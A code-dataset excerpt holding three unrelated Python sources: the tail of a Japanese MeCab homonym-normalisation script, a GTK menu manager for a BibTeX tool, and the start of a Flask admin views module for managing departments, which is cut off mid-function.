Out.write(ClusteredH.show_summary()+'\\n')\n if OutFP:\n Out.close()\n\ndef get_exemplars(ExemplarFP):\n WdsReprs={}\n with open(ExemplarFP) as FSr:\n for LiNe in FSr:\n if LiNe:\n KanaRepr=LiNe.strip().split()\n if len(KanaRepr)==2:\n Wd,Repr=KanaRepr[0],KanaRepr[1]\n WdsReprs[Wd]=Repr\n return WdsReprs\n\ndef upto_char(Str,Chars):\n Substr=''\n for Char in Str:\n if Char in Chars:\n break\n else:\n Substr+=Char\n return Substr\n\ndef normalise_mecabfile(FP,RelvFts,ClusteredHs,OutFP=None,RelvFtCnt=7,CorpusOrDic='corpus',KanaOnly=True,UnnormalisableMarkP=True):\n # outfp could be none, true or string\n if not OutFP:\n Out=sys.stdout\n else:\n if OutFP is True:\n TmpOutFP=FP+'.normed.tmp'\n else:\n TmpOutFP=OutFP+'.tmp'\n Out=open(TmpOutFP,'wt')\n\n AlreadyNormedCommonFtsVals=set()\n MSs,Consts=None,myModule.prepare_progressconsts(FP)\n FSr=open(FP)\n ClusteredHDic={tuple(ClusterH.cluster_on):ClusterH for ClusterH in ClusteredHs}\n for Cntr,LiNe in enumerate(FSr):\n if Cntr+1%1000==0:\n MSs=myModule.progress_counter(MSs,Cntr,Consts)\n if not LiNe.strip():\n continue\n if CorpusOrDic=='corpus' and LiNe=='EOS\\n':\n AsItIs=True\n elif KanaOnly and not myModule.all_of_chartypes_p(upto_char(LiNe,[',','\\t']),['hiragana','katakana','roman']):\n AsItIs=True\n else:\n CommonFtsVals=tuple(mecabtools.pick_feats_fromline(LiNe,RelvFts,CorpusOrDic=CorpusOrDic))\n if CorpusOrDic=='corpus' and len(CommonFtsVals)=2:\n sys.stderr.write('\\nnormalised automatically for '+ClusteredH.hiragana_rendering+'\\n')\n ToWrite=NormalisedWd.get_mecabline(CorpusOrDic=CorpusOrDic)+'\\n'\n if CorpusOrDic=='dic':\n AlreadyNormedCommonFtsVals.add(CommonFtsVals)\n else:\n if CorpusOrDic=='corpus' and UnnormalisableMarkP:\n ToWrite='\\nNot automatically normalisable:\\n'+LiNe+'\\n'.join([KanjiWd.orth for KanjiWd in ClusteredH.kanji_tops])+'\\n\\n'\n else:\n ToWrite=LiNe\n \n Out.write(ToWrite)\n \n FSr.close()\n if OutFP:\n Out.close()\n os.rename(TmpOutFP,OutFP)\n\ndef get_clustered_homs(LexFPs,*Args,**KWArgs):\n ClusteredH=[]\n for LexFP in LexFPs:\n if Debug:\n sys.stderr.write('\\n\\nfinding homonym clusters with the lexicon '+LexFP+'\\n\\n')\n ClusteredH.extend(get_clustered_homs_file(LexFP,*Args,**KWArgs))\n return ClusteredH\n \ndef get_clustered_homs_file(LexFP,RelvFts,Frequents=set(),ProbExemplars={},OutFP=None):\n RelvInds=mecabtools.fts2inds(RelvFts,CorpusOrDic='dic')\n if Debug:\n print('doing the raw clustering')\n FtLines={ Ft:Lines for (Ft,Lines) in mecabtools.cluster_samefeat_lines(LexFP,RelvInds).items() if len(Lines)>=2 and Ft[-1]!='*' }\n\n ClusteredHs=[]\n MSs,Consts=None,myModule.prepare_progressconsts(FtLines)\n for Cntr,(FtSet,Lines) in enumerate(FtLines.items()):\n if Debug and Cntr+1%100==0:\n MSs=myModule.prepare_progressconsts(MSs,Cntr,Consts)\n MWds=[ mecabtools.mecabline2mecabwd(Line,CorpusOrDic='dic') for Line in Lines ]\n if Frequents and not any(MWd.orth in Frequents for MWd in MWds):\n continue\n FtSetLabeled=list(zip(RelvFts,FtSet))\n myCHs=ClusteredHomonyms(MWds,FtSetLabeled)\n myCHs.set_exemplar(ProbExemplars)\n ClusteredHs.append(myCHs)\n return ClusteredHs\n\n \ndef collect_freq_wds(FreqWdFP,RankUpTo,HiraganaOnly=False):\n Wds=set()\n with open(FreqWdFP) as FSr:\n for Cntr,LiNe in enumerate(FSr):\n if Cntr==RankUpTo-1:\n break\n Wd=LiNe.strip().strip().split()[-1]\n if HiraganaOnly:\n if myModule.all_of_chartypes_p(Wd,['hiragana']):\n Wds.add(Wd)\n else: \n Wds.add(Wd)\n return Wds\n \n \nclass ClusteredHomonyms:\n def __init__(self,MecabWds,ClusterOn):\n if self.homonymity_check(MecabWds):\n self.cluster_on=tuple(ClusterOn)\n self.hiragana_rendering=jp_morph.kana2kana(self.cluster_on[-1][1])\n self.cluster_str=','.join([Val for (_,Val) in ClusterOn ])\n (KanaC,KanjiCs)=self.cluster_homonyms(MecabWds)\n self.kana_cluster=KanaC\n self.kana_lemma='unknown' if not self.kana_cluster else self.kana_cluster[0].lemma\n self.kanji_clusters=KanjiCs\n self.kanji_tops=[KanjiC[0] for KanjiC in self.kanji_clusters]\n #self.interkanji_dist=InterkanjiDist\n ReprType,ReprWds=self.pick_representative()\n self.represent_wds=ReprWds\n self.represent_type=ReprType\n # exemplar is dynamically set with set_exemplar\n self.exemplar=None\n\n def special_kana_exemplar_p(self):\n # いる なる やる ある only for now\n Specials={'いる':{'infpat':'一段'},'なる':{'cat':'動詞'},'やる':{'cat':'動詞'},'ある':{'cat':'動詞'}}\n Bool=False\n if self.kana_lemma in Specials.keys():\n FtValPairs=Specials[self.kana_lemma]\n if all(self.represent_wds[0].__dict__[Ft]==Val for (Ft,Val) in FtValPairs.items()):\n Bool=True\n \n return Bool\n \n def set_exemplar(self,ProbExemplars):\n Normalisable=False;Exemplar=None\n if self.special_kana_exemplar_p():\n # special exceptions where you don't convert to kanji\n Exemplar=self.kana_cluster[0]\n elif not self.kanji_clusters:\n # kana only case\n Normalisable=True\n Exemplar=self.kana_cluster[0]\n elif len(self.kanji_clusters)==1:\n # nonambiguous kanji case\n Normalisable=True\n Exemplar=self.represent_wds[0]\n elif self.kana_lemma in ProbExemplars.keys():\n ExemplarWds= [Wd for Wd in myModule.flatten_list(self.kanji_clusters) if Wd.lemma in ProbExemplars.values()]\n if ExemplarWds:\n Normalisable=True\n Exemplar=ExemplarWds[0]\n \n self.exemplar=Exemplar\n return Normalisable\n \n def pick_representative(self,Criterion='rate'):\n if not (self.kana_cluster or self.kanji_clusters):\n sys.exit('something is wrong, no cluster content')\n else:\n# # this means only kanji clusteres are populated\n # if not self.kana_cluster:\n # return ('kanji',self.kanji_clusters[0][0])\n # #and this, only kana cluster exists\n # elif not self.kanji_clusters:\n # return ('kana',self.kana_cluster[0])\n # # the following two are when both exist, and then, it depens on the count\n # else:\n if Criterion=='count':\n if self.kana_cluster[0].count*0.6>self.kanji_clusters[0][0].count:\n return 'kana',self.kana_cluster[0]\n else:\n return 'kanji',self.kanji_clusters[0][0]\n else:\n if not self.kanji_clusters:\n return 'kana',[jp_morph.pick_highest_charrate(self.kana_cluster,['hiragana'])[0]]\n else:\n return 'kanji',[jp_morph.pick_highest_charrate(Cluster,['han'])[0] for Cluster in self.kanji_clusters]\n\n def homonymity_check(self,MecabWds):\n Bool=True; PrvPron=None\n for MecabWd in MecabWds:\n if PrvPron:\n if MecabWd.pronunciation!=PrvPron:\n Bool=False\n break\n PrvPron=MecabWd.pronunciation\n return Bool\n \n def cluster_homonyms(self,MecabWds,SortP=False):\n KanaCluster=[ Hom for Hom in MecabWds if myModule.all_of_chartypes_p(Hom.orth,['hiragana','katakana','roman']) ]\n if SortP:\n KanaCluster=sorted(KanaCluster,key=lambda x:x.count,reverse=True)\n\n KanjiClusters=[]\n for Cntr,Hom in enumerate(set(MecabWds)-set(KanaCluster)):\n if Cntr==0:\n KanjiClusters.append([Hom])\n else:\n for Cluster in KanjiClusters:\n if homonympair_identical_p(Cluster[-1],Hom):\n Cluster.append(Hom)\n break\n else:\n KanjiClusters.append([Hom])\n\n if SortP:\n # sorting, inside a kanji cluster\n KanjiClusters=[ sorted(Cluster,key=lambda x:x.count,reverse=True) for Cluster in KanjiClusters ]\n # sorting, between clusters\n if len(KanjiClusters)>=2:\n KanjiClusters=sorted( KanjiClusters, key=lambda x:x[0].count, reverse=True )\n# InterClusterDist=probability.DiscDist({ KanjiCluster[0]:KanjiCluster[0].count for KanjiCluster in KanjiClusters },Smooth=True)\n \n return KanaCluster,KanjiClusters\n #,InterClusterDist\n\n def order_clusters(self):\n if not self.kanji_clusters:\n OrderedReprs=[self.order_by_countscore(self.kana_cluster)]\n else:\n OrderedReprs=[]\n for KanjiC in self.kanji_clusters:\n OrderedReprs.append(self.order_by_countscore(self.kana_cluster.union(KanjiC)))\n self.ordered_clusters=sorted(OrderedReprs,key=lambda x: x[0].count, reverse=True)\n \n def order_by_countscore(self,OrgWds,RareKanjiScale=4):\n ApplyRKS=False\n Wds=copy.copy(OrgWds)\n RareKanjis= [Wd for Wd in Wds if Wd.count<5 and any(myModule.identify_chartype(Char)=='han' for Char in Wd.orth)]\n if RareKanjis:\n ApplyRKS=True\n WdsScores=[]\n for Wd in Wds:\n if ApplyRKS:\n if Wd in RareKanjis:\n WdsScores.append((Wd,(Wd.count+1)*RareKanjiScale))\n elif myModule.all_of_chartypes_p(Wd.orth,['hiragana','katakana']):\n WdsScores.append((Wd,Wd.count//RareKanjiScale))\n else:\n WdsScores.append((Wd,Wd.count))\n else:\n WdsScores.append((Wd,Wd.count))\n return [ Wd for (Wd,Score) in sorted(WdsScores,key=lambda x:x[1],reverse=True) ]\n\n def show_summary(self):\n get_wdcntstrs=lambda Cl: [ Wd.orth+' '+str(Wd.count) for Wd in Cl]\n Lines=[]\n Lines.append(self.hiragana_rendering)\n Lines.append(repr(self.cluster_on))\n Lines.append(repr([Wd.orth for Wd in self.represent_wds]))\n ExemplarStr='Exempar: '\n if self.exemplar:\n ExemplarStr+=self.exemplar.orth\n else:\n ExemplarStr+=' NONE'\n Lines.append(ExemplarStr)\n Lines.append('kana cluster: '+' '.join(get_wdcntstrs(self.kana_cluster)))\n KanjiClustersStr=''\n if self.kanji_clusters:\n for Cl in self.kanji_clusters:\n KanjiClustersStr+=' '.join(get_wdcntstrs(Cl))+' / '\n Lines.append('kanji clusters: '+KanjiClustersStr)\n #LineElsIKD=[]\n# if len(self.kanji_clusters)>=2:\n # for (Evt,Prob) in self.interkanji_dist.evtprob.items():\n # LineElsIKD.append(Evt.orth+str(Prob))\n #Lines.append('kanji-conversion ratio '+' '.join(LineElsIKD))\n return '\\n'.join(Lines)\n\ndef output_model_text(Homs,Out):\n FSw=open(Out,'wt')\n for Hom in Homs:\n try:\n ClusterStr=Hom.show_summary()\n except:\n Hom.show_summary()\n FSw.write(ClusterStr+'\\n\\n')\n \n FSw.close()\n\n\ndef main00(CorpusFPs,LexFP,FtNums,AdditionalLexs=[],OutputModelText=None, CorpusOnly=False,UsePrevClusteredHoms=None,Debug=0):\n \n if UsePrevClusteredHoms:\n PickleFP=UsePrevClusteredHoms\n else:\n PickleFP='_'.join(CorpusFPs)+'_'+os.path.basename(LexFP)+'.clusteredhoms.pickle'\n (ClusteredHoms,_)=myModule.ask_filenoexist_execute_pickle(PickleFP,create_clustered_homonyms,([CorpusFPs,LexFP,FtNums],{}))\n if OutputModelText:\n OutFP=PickleFP.replace('.pickle','.txt')\n output_model_text(ClusteredHoms,OutFP)\n \n print('\\nextracting items to normalise...')\n WdsRepls=extract_wds2normalise(ClusteredHoms)\n\n print('\\nnormalising corpora...')\n normalise_mecab(CorpusFPs,WdsRepls,'corpus',Debug=Debug)\n\n if not CorpusOnly:\n print('\\nnormalising main lexicon...')\n normalise_mecab([LexFP],WdsRepls,'lex')\n if AdditionalLexs:\n print('\\nnormalising other lexicons...')\n normalise_mecab(AdditionalLexs,WdsRepls,'simplelex')\n\n \ndef create_clustered_homonyms(CorpusFPs,LexFP,FtNums):\n print('\\nfirst we do the raw counts')\n ClusteredWds=count_variants(CorpusFPs)\n print('\\nnow we collect non-ocurring items from the lexicon')\n ClusteredWds=augment_withnulloccs(ClusteredWds,FtNums,LexFP)\n print('\\nnow we cluster homonyms')\n ClusteredHoms=normalise_clustered_wds(ClusteredWds)\n return ClusteredHoms\n\ndef normalise_mecab(Files, WdsRepls, LorC='corpus',Debug=0):\n for File in Files:\n print('normalising '+File)\n normalise_mecab_file(File,WdsRepls,LorC,Debug=Debug)\n\ndef normalise_mecab_file(InputFP,WdsRepls,LexOrCorpus,OutputDiff=True,Debug=0):\n\n def return_match_ifany(Line,LinesRepls,LexOrCorpus,Regex):\n if LexOrCorpus=='lex':\n LineForm=re.sub(Regex,'\\t',Line)\n elif LexOrCorpus=='simplelex':\n LineForm=Line.split('\\t')[0]\n else:\n LineForm=Line\n if LineForm in LinesRepls.keys():\n ToReturn=LinesRepls[LineForm]\n else:\n ToReturn=None\n return ToReturn\n\n LinesRepls={ Wd.get_mecabline():Repl for (Wd,Repl) in WdsRepls.items() }\n\n FSr=open(InputFP)\n FSw=open(InputFP+'.normed','wt')\n\n Regex=re.compile(r',([0-9]+,){3}')\n if Debug:\n TgtLines=set([Line for Line in LinesRepls.keys()])\n SrcLinesUpTo100k=set();AllP=False\n for i in range(100000):\n Next=FSr.readline()\n if not Next:\n AllP=True\n break\n else:\n SrcLinesUpTo100k.add(Next.strip())\n if LexOrCorpus=='lex':\n SrcLinesUpTo100k={re.sub(Regex,'\\t',Line) for Line in SrcLinesUpTo100k}\n Intersect=TgtLines.intersection(SrcLinesUpTo100k)\n \n FSr.seek(0)\n\n if not Intersect:\n if AllP:\n print('there is no match, no point processing')\n else:\n print('there is no match for the first 100k, probable that there is none')\n if OutputDiff:\n FSwDiff=open(InputFP+'.diff','wt')\n show_linediff=lambda LiNe1,LiNe2: LiNe1.strip()+'\\n'+LiNe2.strip()\n for Cntr,LiNe in enumerate(FSr):\n Alt=return_match_ifany(LiNe.strip(),LinesRepls,LexOrCorpus,Regex)\n if Alt:\n AmbP=False\n if LexOrCorpus=='corpus':\n if isinstance(Alt,mecabtools.MecabWdParse):\n Picked=Alt\n else:\n Picked=probability.rand_biased(Alt)\n AmbP=True\n NewLiNe=Picked.get_mecabline()+'\\n'\n\n if OutputDiff:\n if AmbP:\n FSwDiff.write('ambiguous case, competitors are: ')\n FSwDiff.write(repr([(Wd.orth,Prob) for (Wd,Prob) in Alt.evtprob.items()])+'\\n')\n FSwDiff.write(show_linediff(LiNe,NewLiNe)+'\\n\\n')\n\n FSw.write(NewLiNe)\n else:\n print('found')\n pass\n else:\n FSw.write(LiNe)\n if OutputDiff:\n FSwDiff.close()\n FSr.close();FSw.close()\n\n\ndef extract_wds2normalise(HomCs,Debug=0):\n Wds2Normalise={}\n for HomC in HomCs:\n # if the representative is all-kana, we render everything that representative\n if HomC.represent_type=='kana':\n # that means the targets are everything except the representative itself\n Wds2Change2Kana=HomC.kana_cluster[1:]+myModule.flatten_list(HomC.kanji_clusters)\n for Wd2Change2Kana in Wds2Change2Kana:\n Wds2Normalise[Wd2Change2Kana]=HomC.represent_wd\n # on the other hand if it includes kanji, we keep the top ranked element in each cluster\n elif HomC.represent_type=='kanji':\n for KanaWd in HomC.kana_cluster:\n IKD=HomC.interkanji_dist\n KanjiWd=(list(IKD.evtprob.keys())[0] if IKD.evtcount==1 else IKD)\n Wds2Normalise[KanaWd]=KanjiWd\n for KanjiC in HomC.kanji_clusters:\n for NonTopKanjiWd in KanjiC[1:]:\n Wds2Normalise[NonTopKanjiWd]=KanjiC[0]\n return Wds2Normalise\n\n\ndef pick_corefts(Fts):\n return tuple([(NumsFts[Num],Fts[Num]) for Num in CoreFtNums])\n \n\ndef count_variants(MecabCorpusFPs):\n CumCoreFtsCnts={}\n for FP in MecabCorpusFPs:\n CoreFtsCntsPerCorpus=mecabtools.count_words(FP)\n CumCoreFtsCnts=myModule.merge_countdics(CumCoreFtsCnts,CoreFtsCntsPerCorpus)\n \n ClusteredWdsCnts=wdscnts2clusteredcnts(CumCoreFtsCnts)\n return ClusteredWdsCnts\n\ndef wdscnts2clusteredcnts(WdsCnts):\n Clustered={}\n\n for (Wd,Fts),Cnt in WdsCnts.items():\n \n FtsDic={'orth':Wd}\n for Num in range(9):\n FtsDic[NumsFts[Num]]=Fts[Num]\n # here you make an wd obj\n MWd=mecabtools.MecabWdParse(**FtsDic)\n MWd.set_count(Cnt)\n RelvFts=pick_corefts(Fts)\n #tuple([ (NumsFts[Num],Fts[Num]) for Num in ClusterOn ])\n \n if RelvFts not in Clustered.keys():\n Clustered[RelvFts]={MWd}\n else:\n Clustered[RelvFts].add(MWd)\n ClusteredMoreThan1={ Header:Wds for Header,Wds in Clustered.items() if len(Wds)>=2 }\n return ClusteredMoreThan1\n\n\ndef wdcnt2wdfts(CoreFts,WdsCnts):\n WdFts=[]\n for (Wd,OtherFts) in WdsCnts:\n WdFts.append((Wd,CoreFts[:-1]+OtherFts+CoreFts[-1:]))\n return WdFts\n\ndef augment_withnulloccs(ClusteredWds,FtNums,LexFP):\n for Cntr,LexLiNe in enumerate(open(LexFP)):\n if not mecabtools.not_proper_jp_p(LexLiNe):\n WdFtPairInLex=mecabtools.line2wdfts(LexLiNe,'dic')\n Orth,FtsLex=WdFtPairInLex\n if len(FtsLex)!=9:\n sys.stderr.write('something wrong with Line: '+str(Cntr+1)+' '+LexLiNe)\n continue\n Fts={}\n Fts['orth']=Orth\n Fts.update([ (NumsFts[Cntr],Val) for (Cntr,Val) in enumerate(FtsLex) ])\n WdInLex=mecabtools.MecabWdParse(**Fts)\n WdInLex.lexpos=Cntr+1\n CoreFtsLexLine=tuple([(NumsFts[Column-1],FtsLex[Column-1]) for Column in FtNums])\n # check if the dic entry is in the cluster set\n if CoreFtsLexLine in ClusteredWds.keys():\n # if it is, check the whole entry exists in it by checking noncore features match\n Cluster=ClusteredWds[CoreFtsLexLine]\n Fnd=False\n for WdInCorpus in Cluster:\n if all(WdInCorpus.__dict__[NonCoreFt] == WdInLex.__dict__[NonCoreFt] for NonCoreFt in NonCoreFts):\n Fnd=True\n WdInCorpus.lexpos=Cntr+1\n break\n if not Fnd:\n WdInLex.count=0\n ClusteredWds[CoreFtsLexLine].add(WdInLex)\n \n return ClusteredWds\n\ndef sift_list_relv_irrelv(List,Conditions=[],CntrConditions=[]):\n Relvs = []; Irrelvs = []\n for Cntr,El in enumerate(List):\n if all(Condition(El) for Condition in Conditions) and all(CntrCondition(Cntr) for CntrCondition in CntrConditions):\n Relvs.append(El)\n else:\n Irrelvs.append(El)\n return tuple(Relvs),tuple(Irrelvs)\n \n\ndef normalise_clustered_wds(ClusteredWds,Exclude=(),Debug=0):\n FtsReprs=[]\n for CoreFts,Cluster in ClusteredWds.items():\n Cluster=list(Cluster)\n if len(Cluster)==1:\n\n sys.stderr.write('no ambiguity\\n')\n# sys.stdout.write(Lines[0]+'\\n')\n else:\n if Debug:\n sys.stderr.write('\\ncandidates')\n sys.stderr.write('\\n'+repr([Wd.orth for Wd in Cluster])+'\\n')\n\n MyHoms=ClusteredHomonyms(Cluster,CoreFts)\n if Debug:\n print(MyHoms.show_summary())\n FtsReprs.append(MyHoms)\n \n return FtsReprs\n\n\ndef reduce_infwds(LexemeClusters,Debug=0):\n #WdFts should be a pair, word and features\n NewLexCs=OrderedDict()\n for LexemeFts,Lines in LexemeClusters.items():\n if LexemeFts[0] in ('動詞','形容詞'):\n ReprLineEls=reduce_infwd(LexemeFts,Lines)\n NewLexCs[LexemeFts]=[','.join(ReprLineEls)]\n else:\n NewLexCs[LexemeFts]=Lines\n return NewLexCs\n\ndef reduce_infwd(LexemeFts,Lines):\n def change_last_char(Str):\n if Str[-1]=='う':\n return Str[:-1]+'w'\n elif Str[-1]=='え':\n return Str[:-1]\n else:\n return Str[:-1]+romkan.to_hepburn(Str[-1])[0]\n\n (PoS,SubCat,_,_,InfType,InfCat)=LexemeFts\n\n ReprLineEls=next(Line for Line in Lines if Line.split(',')[9]=='基本形').split(',')\n DanGyo=InfType.split('・')\n if DanGyo[0]=='五段':\n ReprLineEls=[ change_last_char(ReprLineEl) if Cntr==0 or Cntr>=10 else ReprLineEl for (Cntr,ReprLineEl) in enumerate(ReprLineEls) ]\n \n elif DanGyo[0]=='一段' or PoS=='形容詞':\n ReprLineEls=[ ReprLineEl[:-1] if Cntr==0 or Cntr>=10 else ReprLineEl for (Cntr,ReprLineEl) in enumerate(ReprLineEls) ]\n\n return ReprLineEls\n\n\ndef choose_from_homonyms(Homs): \n return Homs.pop(),Homs\n\n#### CORE STUFF #####\ndef homonympair_identical_p(Homonym1,Homonym2):\n # trivial case\n if Homonym1.orth==Homonym2.orth:\n Bool=True\n else:\n # default is true\n Bool=True\n # but don't accept kanji-only pairs as synonyms\n if all(myModule.all_of_chartypes_p(Homonym.orth,['han']) for Homonym in (Homonym1,Homonym2)):\n Bool=False\n # otherwise, we take all the kanjis from each and if one does not contain another, we say they're not synonyms\n Kanjis1={ Char for Char in Homonym1.orth if myModule.identify_type_char(Char)=='han'}\n Kanjis2={ Char for Char in Homonym2.orth if myModule.identify_type_char(Char)=='han'}\n if not (Kanjis1.issubset(Kanjis2) or Kanjis2.issubset(Kanjis1)):\n Bool=False\n #otherwise it's a synonym\n else:\n Bool=True\n \n return Bool\n\n\n\ndef cluster_possibly_ambiguous_p(Cluster):\n KanaTypes=['hiragana','katakana','roman']\n KanjiContained=[Wd for Wd in Cluster if not myModule.all_of_chartypes_p(Wd.orth,KanaTypes)]\n if Debug:\n print([Wd.orth for Wd in Cluster])\n #if theres no kanji, they're just the same\n if not KanjiContained:\n Bool= False\n else:\n Bool=any(not homonympair_identical_p(Wd1,Wd2) for (Wd1,Wd2) in itertools.combinations(Cluster,2))\n\n if Debug:\n DebugStr=('ambiguous' if Bool else 'unambiguous')\n print(DebugStr+'\\n')\n \n return Bool\n\n\n \ndef main():\n import argparse,glob\n\n APsr=argparse.ArgumentParser()\n APsr.add_argument('-l','--lexicon-dir',required=True)\n APsr.add_argument('mecab_corpus_dir')\n APsr.add_argument('--debug',type=int,default=0)\n APsr.add_argument('--previous-clusteredhoms',default=None)\n APsr.add_argument('--additional-lexs',nargs='+',default=[])\n #APsr.add_argument('--corpus-only',action='store_true')\n APsr.add_argument('--unnormalisable-unmark',action='store_true')\n APsr.add_argument('--output-text',action='store_true')\n APsr.add_argument('-f','--freq-word-fp')\n APsr.add_argument('-e','--exemplar-fp')\n \n Args=APsr.parse_args()\n\n FPSets=[]\n for Dir,Ext in ((Args.lexicon_dir,'csv'),(Args.mecab_corpus_dir,'mecab')):\n if not os.path.isdir(Dir):\n sys.exit('\\n\\nspecified dir does not exist: '+Dir+'\\n')\n else:\n FPs=glob.glob(os.path.join(Dir,'*.'+Ext))\n if not FPs:\n sys.exit('\\n\\nno right file in specified dir: '+Dir+'\\n')\n else:\n FPSets.append(FPs)\n \n # generally, the exemplar file should be in the lex dir, the frequency file in the corpusdir\n AssistFPs=[ (Type,AssistFP) for (Type,AssistFP) in (('freq_word_fp',Args.freq_word_fp),('exemplar_fp',Args.exemplar_fp)) if AssistFP ]\n for Type,AssistFP in AssistFPs:\n if '/' not in AssistFP:\n Dir=Args.mecab_corpus_dir if Type=='freq_word_fp' else Args.lexicon_dir\n FP=os.path.join(Dir,AssistFP)\n if os.path.isfile(FP):\n Args.__dict__[Type]=FP\n else:\n sys.exit('AssistFP '+FP+' does not exist')\n \n main0(FPSets[0],FPSets[1],FreqWdFP=Args.freq_word_fp,ProbExemplarFP=Args.exemplar_fp,UnnormalisableMarkP=not Args.unnormalisable_unmark)\n\n\n\n\nif __name__=='__main__':\n main()\n","sub_path":"normalise_jp_shared/normalise_mecab.py","file_name":"normalise_mecab.py","file_ext":"py","file_size_in_byte":28193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"197608192","text":"import gi\n# import pybib\n# import view\n# import os\nimport io\nfrom gi.repository import Gtk\ngi.require_version(\"Gtk\", \"3.0\")\n\n\nclass MenuManager:\n\n def __init__(self):\n self.parsing = pybib.parser()\n self.TreeView = view.treeview()\n\n def file_new_clicked(self, widget):\n dialog = Gtk.FileChooserDialog(\"Open an existing fine\", None,\n Gtk.FileChooserAction.OPEN,\n (Gtk.STOCK_CANCEL,\n Gtk.ResponseType.CANCEL,\n Gtk.STOCK_OPEN, Gtk.ResponseType.OK))\n # self.add_filters(dialog)\n response = dialog.run()\n if response == Gtk.ResponseType.OK:\n self.filename = dialog.get_filename()\n return(self.filename)\n elif response == Gtk.ResponseType.CANCEL:\n print(\"Cancel clicked\")\n\n dialog.destroy()\n\n def file_open_clicked(self, SimpleAction, parameter):\n dialog = Gtk.FileChooserDialog(\"Open an existing fine\", None,\n Gtk.FileChooserAction.OPEN,\n (Gtk.STOCK_CANCEL,\n Gtk.ResponseType.CANCEL,\n Gtk.STOCK_OPEN, Gtk.ResponseType.OK))\n filter = Gtk.FileFilter()\n filter.set_name(\"BiBTex File\")\n filter.add_pattern(\"*.bib\")\n dialog.add_filter(filter)\n filter = Gtk.FileFilter()\n filter.set_name(\"All Files\")\n filter.add_pattern(\"*\")\n dialog.add_filter(filter)\n\n response = dialog.run()\n if response == Gtk.ResponseType.OK:\n filename = dialog.get_filename()\n dialog.destroy()\n del self.TreeView.full_list[:]\n del self.parsing.booklist[:]\n self.TreeView.bookstore.clear()\n self.TreeView.indxcount = 0\n with open(filename, \"r\") as filename:\n self.parsing.parsing_read(filename)\n self.TreeView.viewer(self.parsing.booklist)\n elif response == Gtk.ResponseType.CANCEL:\n print(\"Cancel clicked\")\n dialog.destroy()\n\n def file_save_as_clicked(self, SimpleAction, parameter):\n dialog = Gtk.FileChooserDialog(\"Save as an existing file\", None,\n Gtk.FileChooserAction.SAVE,\n (Gtk.STOCK_CANCEL,\n Gtk.ResponseType.CANCEL,\n Gtk.STOCK_SAVE, Gtk.ResponseType.OK))\n filter = Gtk.FileFilter()\n filter.set_name(\"BiBTex File\")\n filter.add_pattern(\"*.bib\")\n dialog.add_filter(filter)\n filter = Gtk.FileFilter()\n filter.set_name(\"All Files\")\n filter.add_pattern(\"*\")\n dialog.add_filter(filter)\n\n response = dialog.run()\n if response == Gtk.ResponseType.OK:\n filename = dialog.get_filename()\n print(filename)\n self.parsing.parsing_write(filename)\n elif response == Gtk.ResponseType.CANCEL:\n print(\"Cancel clicked\")\n dialog.destroy()\n\n def on_menu_file_quit(self, widget):\n Gtk.main_quit()\n\n # def on_menu_others(self, widget):\n # print(\"Menu item \" + widget.get_name() + \" was selected\")\n\n # def on_menu_choices_changed(self, widget, current):\n # filename = current.get_name()+\".xml\"\n # print(filename + \" will be opened\")\n\n def create_textview(self, SimpleAction, parameter):\n self.popup = Gtk.Window()\n self.popup.set_title(\"Add a complete bibtex entry\")\n self.popup.set_default_size(350, 350)\n grid = Gtk.Grid()\n scrolw = Gtk.ScrolledWindow()\n scrolw.set_hexpand(True)\n scrolw.set_vexpand(True)\n button = Gtk.Button(\"Create\")\n button.connect(\"clicked\", self.create_from_buffer)\n tview = Gtk.TextView()\n tview.set_wrap_mode(Gtk.WrapMode.WORD)\n\n # Get the buffer\n self.textbuffer = tview.get_buffer()\n scrolw.add(tview)\n grid.attach(scrolw, 0, 0, 10, 10)\n grid.attach(button, 0, 11, 10, 1)\n self.popup.add(grid)\n self.popup.show_all()\n\n def create_from_buffer(self, widget):\n start_iter = self.textbuffer.get_start_iter()\n end_iter = self.textbuffer.get_end_iter()\n text = io.StringIO(self.textbuffer.get_text(start_iter,\n end_iter, True))\n del self.parsing.booklist[:]\n self.parsing.parsing_read(text)\n self.TreeView.viewer(self.parsing.booklist)\n self.popup.destroy()\n","sub_path":"ptbl/menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":4705,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"198661524","text":"#app/admin/views\n\nfrom flask import abort, render_template, url_for, redirect, flash\nfrom flask_login import current_user, login_required\n\nfrom . import admin\nfrom .forms import DepartmentForm, RoleForm, EmployeeAssignForm\nfrom .. import db\nfrom ..models import Department, Role, Employee\n\ndef check_admin():\n\n \"\"\"\n prevent non-admin user to access this page\n\n \"\"\"\n if not current_user.is_admin:\n abort(403)\n\n@admin.route('/departments/list', methods=['GET','POST'])\n@login_required\ndef list_departments():\n \"\"\"\n List all departments\n\n \"\"\"\n\n check_admin()\n departments = Department.query.all()\n return render_template('list_departments.html', departments=departments, title='Departments')\n\n@admin.route('/departments/add', methods=['GET','POST'])\n@login_required\ndef add_department():\n\n \"\"\"\n add department to the database\n\n \"\"\"\n check_admin()\n add_department = True\n\n form = DepartmentForm()\n if form.validate_on_submit():\n department = Department(name=form.name.data, description=form.description.data)\n try:\n # add department to the database\n\n db.session.add(department)\n db.session.commit()\n flash('You has successfully added a new department')\n except:\n # in case department name already exists\n flash('Error: Your new department name already exists')\n return redirect(url_for('admin.list_departments'))\n #load department template\n return render_template('department.html', action='Add', add_department=add_department, form=form, title='Add Department')\n\n\n@admin.route('/departments/edit/', methods=['GET','POST'])\n@login_required\ndef edit_department(id):\n\n \"\"\"\n edit a department\n\n \"\"\"\n check_admin()\n\n add_department=False\n department =Department.query.get_or_404(id)\n form = DepartmentForm(obj=department)\n if form.validate_on_submit():\n department.name=form.name.data\n department.description = form.description.data\n db.session.commit()\n flash('You have successfully edited this department')\n # return to list department page\n return redirect(url_for('admin.list_departments'))\n\n form.name.data = department.name\n form.description.data = department.description\n return render_template('department.html', action='Edit', add_department=add_department, department=department, form=form, title='Edit Depart,ent')\n\n\n@admin.route('/departments/delete/', methods=['GET','POST'])\n@login_required\ndef delete_department(id):\n \"\"\"\n delete a department from database\n\n \"\"\"\n\n check_admin()\n department =Department.query.get_or_404(id)\n db.session.delete(department)\n db.session.commit()\n\n flash('You have successfully deleted a department')\n\n return redirect(url_for('admin.list_departments'))\n\n return render_template(title='Delete Department')\n\n\n@admin.route('/roles/list', methods=['GET', 'POST'])\n@login_required\ndef list_roles():\n \"\"\"\n list all roles in the database\n \"\"\"\n 